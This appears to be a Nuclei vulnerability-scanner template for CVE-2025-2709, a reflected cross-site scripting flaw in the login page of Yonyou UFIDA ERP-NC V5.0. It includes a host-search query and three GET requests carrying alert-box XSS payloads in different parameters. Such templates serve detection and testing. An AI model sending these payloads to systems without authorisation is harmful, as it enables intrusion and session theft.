id: CVE-2025-2709 info: name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the key and redirect parameters in login.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. impact: | Attackers can inject malicious JavaScript through multiple parameters in login.jsp, potentially stealing user credentials, session cookies, or redirecting users to malicious sites. remediation: | Upgrade to Yonyou UFIDA ERP-NC version 5.1 or later that properly sanitizes user input. reference: - https://github.com/Hebing123/cve/issues/84 - https://nvd.nist.gov/vuln/detail/CVE-2025-2709 classification: epss-score: 0.00835 epss-percentile: 0.52804 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-2709 cwe-id: CWE-79 cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" tags: cve,cve2025,xss,erp-nc,ufida,yonyou,vuln http: - method: GET path: - "{{BaseURL}}/login.jsp?onlyOnePerVM=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E" - "{{BaseURL}}/login.jsp?redirect=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E" - "{{BaseURL}}/login.jsp?nodeid=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '' - 'this explore not support plug in' condition: and - type: word part: content_type words: - 'text/html' - type: status status: - 200 # digest: 4b0a00483046022100b3cb14b0f9913832b393ababc6b99e958d8dabdf4f982bb5e848f8d41025d98d022100979bdf32623a909a0faa9296738ac4af21aeea1d62c51fc19ed2c1100e713c28:922c64590222798bb761d5b6d8e72950